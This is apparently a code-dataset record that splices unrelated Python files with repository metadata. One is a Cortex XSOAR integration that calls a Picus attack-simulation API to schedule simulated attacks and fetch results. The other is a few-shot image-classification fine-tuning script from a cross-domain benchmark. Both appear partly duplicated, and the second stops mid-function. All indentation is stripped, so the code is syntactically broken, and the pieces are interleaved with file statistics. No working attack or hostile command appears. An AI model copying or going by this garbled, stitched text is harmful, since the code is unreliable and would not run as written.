def test_module() -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
message: str = ''
try:
picus_server = str(demisto.params().get("picus_server"))
picus_server = picus_server[:-1] if picus_server.endswith("/") else picus_server
picus_apikey = demisto.params().get("picus_apikey")
picus_headers = {"X-Refresh-Token": "", "Content-Type": "application/json"}
picus_headers["X-Refresh-Token"] = "Bearer " + str(picus_apikey)
picus_auth_endpoint = "/authenticator/v1/access-tokens/generate"
picus_req_url = str(picus_server) + picus_auth_endpoint
picus_session = requests.Session()
if not demisto.params().get('proxy', False):
picus_session.trust_env = False
picus_auth_response = picus_session.post(picus_req_url, headers=picus_headers, verify=verify_certificate)
picus_auth_response.raise_for_status()
picus_accessToken = json.loads(picus_auth_response.text)["data"]["access_token"]
message = 'ok'
except Exception as e:
if 'Forbidden' in str(e) or 'Authorization' in str(e) or 'NewConnectionError' in str(e) or 'Unauthorized' in str(e) or picus_accessToken is None:
message = 'Authorization Error: make sure API Key or Picus URL is correctly set'
else:
raise e
return message
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
:return:
:rtype:
"""
demisto.debug(f'Command being called is {demisto.command()}')
try:
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module()
return_results(result)
elif demisto.command()=='picus-get-access-token':
result = getAccessToken()
return_results(result)
elif demisto.command()=='picus-get-vector-list':
result = getVectorList()
return_results(result)
elif demisto.command()=='picus-get-peer-list':
result = getPeerList()
return_results(result)
elif demisto.command()=='picus-get-attack-results':
result = getAttackResults()
return_results(result)
elif demisto.command()=='picus-run-attacks':
result = runAttacks()
return_results(result)
elif demisto.command()=='picus-get-threat-results':
result = getThreatResults()
return_results(result)
elif demisto.command()=='picus-set-paramPB':
result = setParamPB()
return_results(result)
elif demisto.command()=='picus-filter-insecure-attacks':
result = filterInsecureAttacks()
return_results(result)
elif demisto.command()=='picus-get-mitigation-list':
result = getMitigationList()
return_results(result)
elif demisto.command() == 'picus-get-vector-compare':
result = getVectorCompare()
return_results(result)
elif demisto.command() == 'picus-version':
result = getPicusVersion()
return_results(result)
elif demisto.command() == 'picus-trigger-update':
result = triggerUpdate()
return_results(result)
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 47.818519 | 231 | 0.70804 | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import requests
import json
import traceback
from datetime import datetime, timedelta
import time
# Disable insecure warnings
requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
# flake8: noqa
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' # ISO8601 format with UTC, default in XSOAR
VALID_VARIANTS = ["HTTP","HTTPS"]
verify_certificate = not demisto.params().get('insecure', False)
def test_module() -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
message: str = ''
try:
picus_server = str(demisto.params().get("picus_server"))
picus_server = picus_server[:-1] if picus_server.endswith("/") else picus_server
picus_apikey = demisto.params().get("picus_apikey")
picus_headers = {"X-Refresh-Token": "", "Content-Type": "application/json"}
picus_headers["X-Refresh-Token"] = "Bearer " + str(picus_apikey)
picus_auth_endpoint = "/authenticator/v1/access-tokens/generate"
picus_req_url = str(picus_server) + picus_auth_endpoint
picus_session = requests.Session()
if not demisto.params().get('proxy', False):
picus_session.trust_env = False
picus_auth_response = picus_session.post(picus_req_url, headers=picus_headers, verify=verify_certificate)
picus_auth_response.raise_for_status()
picus_accessToken = json.loads(picus_auth_response.text)["data"]["access_token"]
message = 'ok'
except Exception as e:
if 'Forbidden' in str(e) or 'Authorization' in str(e) or 'NewConnectionError' in str(e) or 'Unauthorized' in str(e) or picus_accessToken is None:
message = 'Authorization Error: make sure API Key or Picus URL is correctly set'
else:
raise e
return message
def getAccessToken():
picus_server = str(demisto.params().get("picus_server"))
picus_server = picus_server[:-1] if picus_server.endswith("/") else picus_server
picus_apikey = demisto.params().get("picus_apikey")
picus_headers = {"X-Refresh-Token": "", "Content-Type": "application/json"}
picus_headers["X-Refresh-Token"] = "Bearer " + str(picus_apikey)
picus_auth_endpoint = "/authenticator/v1/access-tokens/generate"
picus_req_url = str(picus_server) + picus_auth_endpoint
picus_session = requests.Session()
if not demisto.params().get('proxy', False):
picus_session.trust_env = False
picus_auth_response = picus_session.post(picus_req_url, headers=picus_headers, verify=verify_certificate)
if picus_auth_response.status_code!=200:
return_error(picus_auth_response.text)
picus_accessToken = json.loads(picus_auth_response.text)["data"]["access_token"]
return picus_accessToken
def getVectorList():
picus_endpoint = "/user-api/v1/vectors/list"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(),picus_endpoint)
add_user_details = demisto.args().get('add_user_details')
add_user_details = bool(add_user_details) if add_user_details is not None else add_user_details
page = arg_to_number(demisto.args().get('page'))
size = arg_to_number(demisto.args().get('size'))
picus_post_data = {"add_user_details":add_user_details,"size":size,"page":page}
picus_post_data = assign_params(**picus_post_data)
picus_endpoint_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_post_data),verify=verify_certificate)
picus_vectors = json.loads(picus_endpoint_response.text)["data"]["vectors"]
table_name = "Picus Vector List"
table_headers = ['name','description','trusted','untrusted','is_disabled','type']
md_table = tableToMarkdown(table_name,picus_vectors,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs=picus_vectors,outputs_prefix="Picus.vectorlist")
return results
def getPeerList():
picus_endpoint = "/user-api/v1/peers/list"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(),picus_endpoint)
picus_endpoint_response = requests.post(picus_req_url,headers=picus_headers,verify=verify_certificate)
picus_peers = json.loads(picus_endpoint_response.text)["data"]["peers"]
table_name = "Picus Peer List"
table_headers = ['name','registered_ip','type','is_alive']
md_table = tableToMarkdown(table_name,picus_peers,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs=picus_peers,outputs_prefix="Picus.peerlist")
return results
def getAttackResults():
picus_endpoint = "/user-api/v1/attack-results/list"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
picus_attack_results : List[Any] = []
picus_attack_raw_results: Dict[str,Any] = {"results":[]}
tmp_secure_list: List[Any] = []
tmp_insecure_list: List[Any] = []
tmp_results: List[Any] = []
threat_ids = ""
attacker_peer = demisto.args().get('attacker_peer')
victim_peer = demisto.args().get('victim_peer')
days = int(demisto.args().get('days'))
attack_result = demisto.args().get('result').lower()
attack_result = attack_result[0].upper() + attack_result[1:]
valid_attack_results = ["Insecure","Secure","All"]
check_valid = any(result for result in valid_attack_results if(result==attack_result))
if not check_valid:
msg = "Wrong result parameter. The result parameter can only be secure,insecure and all"
return msg
end_date = datetime.now().strftime("%Y-%m-%d")
begin_date = (datetime.now() - timedelta(days=days)).strftime("%Y-%m-%d")
picus_post_data_secure = {"attack_result":"secure","begin_date":begin_date,"end_date":end_date,"vectors":[{"trusted":victim_peer,"untrusted":attacker_peer}]}
picus_post_data_insecure = {"attack_result":"insecure","begin_date":begin_date,"end_date":end_date,"vectors":[{"trusted":victim_peer,"untrusted":attacker_peer}]}
picus_endpoint_response_secure = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_post_data_secure),verify=verify_certificate)
picus_endpoint_response_insecure = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_post_data_insecure),verify=verify_certificate)
picus_attack_results_secure = json.loads(picus_endpoint_response_secure.text)["data"]["results"]
picus_attack_results_insecure = json.loads(picus_endpoint_response_insecure.text)["data"]["results"]
if picus_attack_results_secure is not None:
picus_attack_results_secure.sort(key=returnListTimeKey,reverse=True)
for i in range(len(picus_attack_results_secure)):
exists = 0
list_len = len(tmp_secure_list)
for j in range(list_len):
if picus_attack_results_secure[i]["threat_id"] == tmp_secure_list[j]["threat_id"]:
exists = 1
if exists == 0:
tmp_secure_list.append(picus_attack_results_secure[i])
if picus_attack_results_insecure is not None:
picus_attack_results_insecure.sort(key=returnListTimeKey, reverse=True)
for i in range(len(picus_attack_results_insecure)):
exists = 0
list_len = len(tmp_insecure_list)
for j in range(list_len):
if picus_attack_results_insecure[i]["threat_id"] == tmp_insecure_list[j]["threat_id"]:
exists = 1
if exists == 0:
tmp_insecure_list.append(picus_attack_results_insecure[i])
tmp_results = tmp_secure_list + tmp_insecure_list
if len(tmp_results)!=0:
tmp_results.sort(key=returnListTimeKey, reverse=True)
else:
message = "No Results Data."
results = CommandResults(readable_output=message)
return results
for i in range(len(tmp_results)):
exists = 0
list_len = len(picus_attack_results)
for j in range(list_len):
if tmp_results[i]["threat_id"] == picus_attack_results[j]["threat_id"]:
exists = 1
if exists == 0:
picus_attack_results.append(tmp_results[i])
tmp_results = []
for i in range(len(picus_attack_results)):
if attack_result == "All":
tmp_results.append(picus_attack_results[i])
elif picus_attack_results[i]["string"] == attack_result:
tmp_results.append(picus_attack_results[i])
picus_attack_results = tmp_results
for i in range(len(picus_attack_results)):
threat_ids += str(picus_attack_results[i]["threat_id"]) + ","
threat_ids = threat_ids[:-1]
picus_attack_raw_results["results"].append({"threat_ids":threat_ids})
picus_attack_raw_results["results"].append(picus_attack_results)
table_name = attack_result + " Attack List"
table_headers = ['begin_time','end_time','string','threat_id','threat_name']
md_table = tableToMarkdown(table_name,picus_attack_results,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs_prefix="Picus.attackresults",outputs=picus_attack_raw_results,outputs_key_field="results.threat_id")
return results
def runAttacks():
picus_endpoint = "/user-api/v1/schedule/attack/single"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
picus_attack_results : Dict[str,Any] = {"results": []}
picus_attack_raw_results = ""
threat_ids = demisto.args().get('threat_ids')
attacker_peer = demisto.args().get('attacker_peer')
victim_peer = demisto.args().get('victim_peer')
variant = demisto.args().get('variant')
if variant not in VALID_VARIANTS:
return_error("Unknown variant type - "+variant)
threat_ids = list(threat_ids.split(","))
t_count = 0
for threat_id in threat_ids:
try:
threat_id = int(threat_id)
picus_attack_data = {"trusted": victim_peer,"untrusted": attacker_peer,"threat_id": threat_id,"variant": variant}
picus_attack_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_attack_data),verify=verify_certificate)
attack_result_response = json.loads(picus_attack_response.text)["data"]["result"]
picus_attack_result = {"threat_id":threat_id,"result":attack_result_response}
picus_attack_results["results"].append(picus_attack_result)
if attack_result_response == "success":
picus_attack_raw_results += str(threat_id)+","
if t_count == 3:
time.sleep(1)
t_count = 0
else:
t_count+=1
except Exception as e:
picus_attack_result = {"threat_id":threat_id,"result":"unknown error"}
picus_attack_results["results"].append(picus_attack_result)
continue
if len(picus_attack_raw_results)!=0:
picus_attack_raw_results = picus_attack_raw_results[:-1]
picus_attack_results = picus_attack_results["results"]
table_name = "Picus Attack Results"
table_headers = ['threat_id','result']
md_table = tableToMarkdown(table_name, picus_attack_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs_prefix="Picus.runattacks",outputs=picus_attack_raw_results)
return results
def getThreatResults():
picus_endpoint = "/user-api/v1/attack-results/threat-specific-latest"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
picus_threat_results : Dict[str,Any] = {"results":[]}
picus_threat_raw_results = ""
threat_raw_output: Dict[str,Any] = {"results":[]}
threat_ids = demisto.args().get('threat_ids')
attacker_peer = demisto.args().get('attacker_peer')
victim_peer = demisto.args().get('victim_peer')
variant = demisto.args().get('variant')
if variant not in VALID_VARIANTS:
return_error("Unknown variant type - "+variant)
threat_ids = list(threat_ids.split(","))
for threat_id in threat_ids:
try:
threat_id = int(threat_id)
picus_threat_data = {"threat_id": threat_id}
picus_threat_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_threat_data),verify=verify_certificate)
picus_threat_json_result = json.loads(picus_threat_response.text)["data"]["results"]
l1_category = picus_threat_json_result["l1_category_name"]
vector_name = attacker_peer + " - " + victim_peer
vectors_results = picus_threat_json_result["vectors"]
for i in range(len(vectors_results)):
if vectors_results[i]["name"] == vector_name:
variants_results = vectors_results[i]["variants"]
for j in range(len(variants_results)):
if variants_results[j]["name"] == variant:
last_time = variants_results[j]["last_time"]
threat_result = variants_results[j]["result"]
picus_threat_result = {"l1_category":l1_category,"result":threat_result,"threat_id":threat_id,"last_time":last_time,"status":"success"}
picus_threat_results["results"].append(picus_threat_result)
picus_threat_raw_results += str(threat_id) + "=" + threat_result + ","
except Exception as e:
picus_threat_result = {"l1_category": "null","result": "null","threat_id": threat_id,"last_time": "null","status": "fail"}
picus_threat_results["results"].append(picus_threat_result)
continue
if len(picus_threat_raw_results)!=0:
picus_threat_raw_results = picus_threat_raw_results[:-1]
picus_threat_results = picus_threat_results["results"]
threat_raw_output["results"].append({"threat_results":picus_threat_raw_results})
threat_raw_output["results"].append(picus_threat_results)
table_name = "Picus Threat Results"
table_headers = ['threat_id','result','l1_category','last_time','status']
md_table = tableToMarkdown(table_name, picus_threat_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs_prefix="Picus.threatresults",outputs=threat_raw_output,outputs_key_field="results.threat_id")
return results
def filterInsecureAttacks():
threatinfo = demisto.args().get('threatinfo')
threat_ids = ""
threatinfo = list(threatinfo.split(","))
threatinfo = [th_info for th_info in threatinfo if "Insecure" in th_info]
for th_info in threatinfo:
threat_id = th_info.split("=")[0]
threat_ids += str(threat_id) + ","
if len(threat_ids)!=0:
threat_ids = threat_ids[:-1]
results = CommandResults(readable_output=threat_ids,outputs_prefix="Picus.filterinsecure",outputs=threat_ids)
return results
def getMitigationList():
picus_endpoint = "/user-api/v1/threats/mitigations/list"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
picus_mitigation_results : Dict[str,Any] = {"results": []}
threat_ids = demisto.args().get('threat_ids')
product = demisto.args().get('product')
product = list(product.split(","))
threat_ids = list(threat_ids.split(","))
for threat_id in threat_ids:
try:
threat_id = int(threat_id)
picus_threat_data = {"threat_id":threat_id,"products":product}
picus_mitigation_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_threat_data),verify=verify_certificate)
picus_mitigation_result = json.loads(picus_mitigation_response.text)["data"]["mitigations"]
picus_mitigation_count = json.loads(picus_mitigation_response.text)["data"]["total_count"]
if picus_mitigation_count!=0:
for threat_mitigation in picus_mitigation_result:
mitigation_data = {"threat_id":threat_mitigation["threat"]["id"],"signature_id":threat_mitigation["signature"]["id"],"signature_name":threat_mitigation["signature"]["name"],"vendor":threat_mitigation["product"]}
picus_mitigation_results["results"].append(mitigation_data)
except Exception as e:
continue
picus_mitigation_results = picus_mitigation_results["results"]
table_name = "Picus Mitigation List"
table_headers = ['threat_id','signature_id','signature_name','vendor']
md_table = tableToMarkdown(table_name, picus_mitigation_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs_prefix="Picus.mitigationresults",outputs=picus_mitigation_results,outputs_key_field="signature_id")
return results
def getVectorCompare():
picus_endpoint = "/user-api/v1/attack-results/compare-a-vector"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
all_vector_results : Dict[str,Any] = {"results": []}
attacker_peer = demisto.args().get('attacker_peer')
victim_peer = demisto.args().get('victim_peer')
days = int(demisto.args().get('days'))
end_date = datetime.now().strftime("%Y-%m-%d")
begin_date = (datetime.now() - timedelta(days=days)).strftime("%Y-%m-%d")
picus_post_data_vector = {"trusted":victim_peer,"untrusted":attacker_peer,"begin_date":begin_date,"end_date":end_date}
picus_vector_response = requests.post(picus_req_url, headers=picus_headers, data=json.dumps(picus_post_data_vector),verify=verify_certificate)
picus_vector_results = json.loads(picus_vector_response.text)["data"]["variants"][0]
picus_vector_secure_results = picus_vector_results["secures"]
picus_vector_insecure_results = picus_vector_results["insecures"]
picus_vector_secure_to_insecures_results = picus_vector_results["secure_to_insecures"]
picus_vector_insecure_to_secures_results = picus_vector_results["insecure_to_secures"]
if picus_vector_secure_results is not None:
for result in picus_vector_secure_results:
tmp_result = {"status":"secure","threat_id":result["threat_id"],"name":result["name"]}
all_vector_results["results"].append(tmp_result)
else:
tmp_result = {"status": "secure", "threat_id": "null", "name": "null"}
all_vector_results["results"].append(tmp_result)
if picus_vector_insecure_results is not None:
for result in picus_vector_insecure_results:
tmp_result = {"status":"insecure","threat_id":result["threat_id"],"name":result["name"]}
all_vector_results["results"].append(tmp_result)
else:
tmp_result = {"status": "insecure", "threat_id": "null", "name": "null"}
all_vector_results["results"].append(tmp_result)
if picus_vector_secure_to_insecures_results is not None:
for result in picus_vector_secure_to_insecures_results:
tmp_result = {"status":"secure_to_insecures","threat_id":result["threat_id"],"name":result["name"]}
all_vector_results["results"].append(tmp_result)
else:
tmp_result = {"status": "secure_to_insecures", "threat_id": "null", "name": "null"}
all_vector_results["results"].append(tmp_result)
if picus_vector_insecure_to_secures_results is not None:
for result in picus_vector_insecure_to_secures_results:
tmp_result = {"status":"insecure_to_secures","threat_id":result["threat_id"],"name":result["name"]}
all_vector_results["results"].append(tmp_result)
else:
tmp_result = {"status": "insecure_to_secures", "threat_id": "null", "name": "null"}
all_vector_results["results"].append(tmp_result)
all_vector_results = all_vector_results["results"]
table_name = "Picus Vector Compare Result"
table_headers = ['status','threat_id','name']
md_table = tableToMarkdown(table_name, all_vector_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs=all_vector_results,outputs_prefix="Picus.vectorresults",outputs_key_field="threat_id")
return results
def returnListTimeKey(attack_result_list):
return attack_result_list.get("end_time")
def setParamPB():
attacker_peer = demisto.args().get('attacker_peer')
victim_peer = demisto.args().get('victim_peer')
variant = demisto.args().get('variant')
if variant not in VALID_VARIANTS:
return_error("Unknown variant type - "+variant)
mitigation_product = demisto.args().get('mitigation_product')
days = int(demisto.args().get('days'))
param_data = {"attacker_peer":attacker_peer,"victim_peer":victim_peer,"variant":variant,"mitigation_product":mitigation_product,"days":days}
results = CommandResults(outputs=param_data,outputs_prefix="Picus.param")
return results
def getPicusVersion():
picus_endpoint = "/user-api/v1/settings/version"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(),picus_endpoint)
picus_endpoint_response = requests.post(picus_req_url,headers=picus_headers,verify=verify_certificate)
picus_version_results = json.loads(picus_endpoint_response.text)["data"]
picus_version_info = {"version":picus_version_results["version"],"update_time":picus_version_results["update_time"],"last_update_date":picus_version_results["last_update_date"]}
table_name = "Picus Version"
table_headers = ['version','update_time','last_update_date']
md_table = tableToMarkdown(table_name,picus_version_info,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs=picus_version_info,outputs_prefix="Picus.versioninfo",outputs_key_field="version")
return results
def triggerUpdate():
picus_endpoint = "/user-api/v1/settings/trigger-update"
picus_req_url, picus_headers = generateEndpointURL(getAccessToken(),picus_endpoint)
picus_endpoint_response = requests.post(picus_req_url,headers=picus_headers,verify=verify_certificate)
picus_update_results = json.loads(picus_endpoint_response.text)
table_name = "Picus Trigger Update"
table_headers = ['data','success']
md_table = tableToMarkdown(table_name,picus_update_results,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
results = CommandResults(readable_output=md_table,outputs=picus_update_results,outputs_prefix="Picus.triggerupdate")
return results
def generateEndpointURL(picus_accessToken,picus_endpoint):
picus_server = str(demisto.params().get("picus_server"))
endpointURL = picus_server + picus_endpoint
picus_headers = {"X-Api-Token": "", "Content-Type": "application/json"}
picus_headers["X-Api-Token"] = "Bearer " + picus_accessToken
return endpointURL, picus_headers
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
:return:
:rtype:
"""
demisto.debug(f'Command being called is {demisto.command()}')
try:
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module()
return_results(result)
elif demisto.command()=='picus-get-access-token':
result = getAccessToken()
return_results(result)
elif demisto.command()=='picus-get-vector-list':
result = getVectorList()
return_results(result)
elif demisto.command()=='picus-get-peer-list':
result = getPeerList()
return_results(result)
elif demisto.command()=='picus-get-attack-results':
result = getAttackResults()
return_results(result)
elif demisto.command()=='picus-run-attacks':
result = runAttacks()
return_results(result)
elif demisto.command()=='picus-get-threat-results':
result = getThreatResults()
return_results(result)
elif demisto.command()=='picus-set-paramPB':
result = setParamPB()
return_results(result)
elif demisto.command()=='picus-filter-insecure-attacks':
result = filterInsecureAttacks()
return_results(result)
elif demisto.command()=='picus-get-mitigation-list':
result = getMitigationList()
return_results(result)
elif demisto.command() == 'picus-get-vector-compare':
result = getVectorCompare()
return_results(result)
elif demisto.command() == 'picus-version':
result = getPicusVersion()
return_results(result)
elif demisto.command() == 'picus-trigger-update':
result = triggerUpdate()
return_results(result)
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 20,984 | 0 | 322 |
bd0aec9e1d68f753b5a96352b8845b7119fb3cc1 | 12,706 | py | Python | cdfsl-benchmark/finetune.py | indy-lab/ProtoTransfer | 90a526bb209160e376b2b8290e99b0f62b240052 | [
"MIT"
] | 43 | 2020-06-23T08:09:08.000Z | 2022-03-03T03:05:34.000Z | cdfsl-benchmark/finetune.py | Asphalt93/ProtoTransfer | 2e186ffd5bd795244c6dd7192575b84f935c5749 | [
"MIT"
] | 5 | 2020-07-03T20:58:24.000Z | 2021-08-04T06:34:09.000Z | cdfsl-benchmark/finetune.py | Asphalt93/ProtoTransfer | 2e186ffd5bd795244c6dd7192575b84f935c5749 | [
"MIT"
] | 9 | 2020-07-21T03:26:29.000Z | 2021-09-26T06:10:37.000Z | import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim
import torch.nn.functional as F
import torch.optim.lr_scheduler as lr_scheduler
import time
import os
import glob
from itertools import combinations
import configs
import backbone
from data.datamgr import SimpleDataManager, SetDataManager
from methods.protonet import ProtoNet
from io_utils import model_dict, parse_args, get_resume_file, get_best_file, get_assigned_file
from utils import *
from datasets import ISIC_few_shot, EuroSAT_few_shot, CropDisease_few_shot, Chest_few_shot
from tqdm import tqdm
import sys
sys.path.append('..')
from methods.protonet import euclidean_dist
if __name__=='__main__':
np.random.seed(10)
params = parse_args('test')
##################################################################
image_size = 224
iter_num = 600
n_query = max(1, int(16* params.test_n_way/params.train_n_way)) #if test_n_way is smaller than train_n_way, reduce n_query to keep batch size small
few_shot_params = dict(n_way = params.test_n_way , n_support = params.n_test_shot)
freeze_backbone = params.freeze_backbone
##################################################################
dataset_names = ["ISIC", "EuroSAT", "CropDisease", "ChestX"]
novel_loaders = []
loader_name = "ISIC"
print ("Loading {}".format(loader_name))
datamgr = ISIC_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
#novel_loaders.append((loader_name, novel_loader))
loader_name = "EuroSAT"
print ("Loading {}".format(loader_name))
datamgr = EuroSAT_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
#novel_loaders.append((loader_name, novel_loader))
loader_name = "CropDisease"
print ("Loading {}".format(loader_name))
datamgr = CropDisease_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
#novel_loaders.append((loader_name, novel_loader))
loader_name = "ChestX"
print ("Loading {}".format(loader_name))
datamgr = Chest_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
novel_loader = datamgr.get_data_loader(aug =False)
novel_loaders.append((loader_name, novel_loader))
#########################################################################
# Print checkpoint path to be loaded
checkpoint_dir = '%s/checkpoints/%s/%s_%s_%s%s_%s%s' %(configs.save_dir, params.dataset,
params.model, params.method,
params.n_support, "s" if params.no_aug_support else "s_aug",
params.n_query, "q" if params.no_aug_query else "q_aug")
checkpoint_dir += "_bs{}".format(params.batch_size)
if params.save_iter != -1:
modelfile = get_assigned_file(checkpoint_dir, params.save_iter)
elif params.method in ['baseline', 'baseline++'] :
modelfile = get_resume_file(checkpoint_dir)
else:
modelfile = get_best_file(checkpoint_dir)
print('Evaluation from checkpoint:', modelfile)
# Perform evaluation
for idx, (loader_name, novel_loader) in enumerate(novel_loaders):
#for idx, novel_loader in tqdm(enumerate(novel_loaders), total=len(novel_loaders), position=0):
print ('Dataset: ', loader_name)
print ('Pretraining Dataset: ', params.dataset)
print('Adaptation? ', params.adaptation)
if params.adaptation:
print (' --> Freeze backbone?', freeze_backbone)
print (' --> Init classifier via prototypes?', params.proto_init)
print (' --> Adaptation steps: ', params.ft_steps)
print (' --> Adaptation learning rate: ', params.lr_rate)
# replace finetine() with your own method
finetune(novel_loader, n_query = 15, adaptation=params.adaptation,
freeze_backbone=freeze_backbone, proto_init=params.proto_init,
pretrained_dataset=params.dataset, **few_shot_params)
| 42.925676 | 199 | 0.548324 | import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim
import torch.nn.functional as F
import torch.optim.lr_scheduler as lr_scheduler
import time
import os
import glob
from itertools import combinations
import configs
import backbone
from data.datamgr import SimpleDataManager, SetDataManager
from methods.protonet import ProtoNet
from io_utils import model_dict, parse_args, get_resume_file, get_best_file, get_assigned_file
from utils import *
from datasets import ISIC_few_shot, EuroSAT_few_shot, CropDisease_few_shot, Chest_few_shot
from tqdm import tqdm
import sys
sys.path.append('..')
from methods.protonet import euclidean_dist
class Classifier(nn.Module):
def __init__(self, dim, n_way):
super(Classifier, self).__init__()
self.fc = nn.Linear(dim, n_way)
def forward(self, x):
x = self.fc(x)
return x
def _set_params(self, weight, bias):
state_dict = dict(weight=weight, bias=bias)
self.fc.load_state_dict(state_dict)
#self.fc.weight.data = weight
#self.fc.bias.data = bias
def init_params_from_prototypes(self, z_support, n_way, n_support):
z_support = z_support.contiguous()
z_proto = z_support.view(n_way, n_support, -1 ).mean(1) #the shape of z is [n_data, n_dim]
# Interpretation of ProtoNet as linear layer (see Snell et al. (2017))
self._set_params(weight=2*z_proto, bias=-torch.norm(z_proto, dim=-1)**2)
class ProtoClassifier():
def __init__(self, n_way, n_support, n_query):
self.n_way = n_way
self.n_support = n_support
self.n_query = n_query
def __call__(self, z_support, y_support, z_query):
# Copied from methods/protonet.py "ProtoNet.set_forward()"
# y_support is ignored (only for compatibility)
z_support = z_support.contiguous()
z_proto = z_support.view(self.n_way, self.n_support, -1 ).mean(1) #the shape of z is [n_data, n_dim]
z_query = z_query.contiguous().view(self.n_way* self.n_query, -1 )
dists = euclidean_dist(z_query, z_proto)
scores = -dists
return scores
def finetune(novel_loader, n_query = 15, freeze_backbone = False,
n_way = 5, n_support = 5, loadpath = '', adaptation = False,
pretrained_dataset = 'miniImagenet', proto_init = False):
correct = 0
count = 0
iter_num = len(novel_loader)
acc_all = []
with tqdm(enumerate(novel_loader), total=len(novel_loader)) as pbar:
for _, (x, y) in pbar:#, position=1,
#leave=False):
###############################################################################################
# load pretrained model on miniImageNet
pretrained_model = model_dict[params.model]()
checkpoint_dir = '%s/checkpoints/%s/%s_%s_%s%s_%s%s' %(configs.save_dir, params.dataset,
params.model, params.method,
params.n_support, "s" if params.no_aug_support else "s_aug",
params.n_query, "q" if params.no_aug_query else "q_aug")
checkpoint_dir += "_bs{}".format(params.batch_size)
if params.save_iter != -1:
modelfile = get_assigned_file(checkpoint_dir, params.save_iter)
elif params.method in ['baseline', 'baseline++'] :
modelfile = get_resume_file(checkpoint_dir)
else:
modelfile = get_best_file(checkpoint_dir)
tmp = torch.load(modelfile)
state = tmp['state']
state_keys = list(state.keys())
for _, key in enumerate(state_keys):
if "feature." in key:
newkey = key.replace("feature.","") # an architecture model has attribute 'feature', load architecture feature to backbone by casting name from 'feature.trunk.xx' to 'trunk.xx'
state[newkey] = state.pop(key)
else:
state.pop(key)
pretrained_model.load_state_dict(state)
pretrained_model.cuda()
pretrained_model.train()
###############################################################################################
if adaptation:
classifier = Classifier(pretrained_model.final_feat_dim, n_way)
classifier.cuda()
classifier.train()
else:
classifier = ProtoClassifier(n_way, n_support, n_query)
###############################################################################################
n_query = x.size(1) - n_support
x = x.cuda()
x_var = Variable(x)
batch_size = n_way
support_size = n_way * n_support
y_a_i = Variable( torch.from_numpy( np.repeat(range( n_way ), n_support ) )).cuda() # (25,)
x_b_i = x_var[:, n_support:,:,:,:].contiguous().view( n_way* n_query, *x.size()[2:])
x_a_i = x_var[:,:n_support,:,:,:].contiguous().view( n_way* n_support, *x.size()[2:]) # (25, 3, 224, 224)
pretrained_model.eval()
z_a_i = pretrained_model(x_a_i.cuda())
pretrained_model.train()
###############################################################################################
loss_fn = nn.CrossEntropyLoss().cuda()
if adaptation:
inner_lr = params.lr_rate
if proto_init: # Initialise as distance classifer (distance to prototypes)
classifier.init_params_from_prototypes(z_a_i,
n_way, n_support)
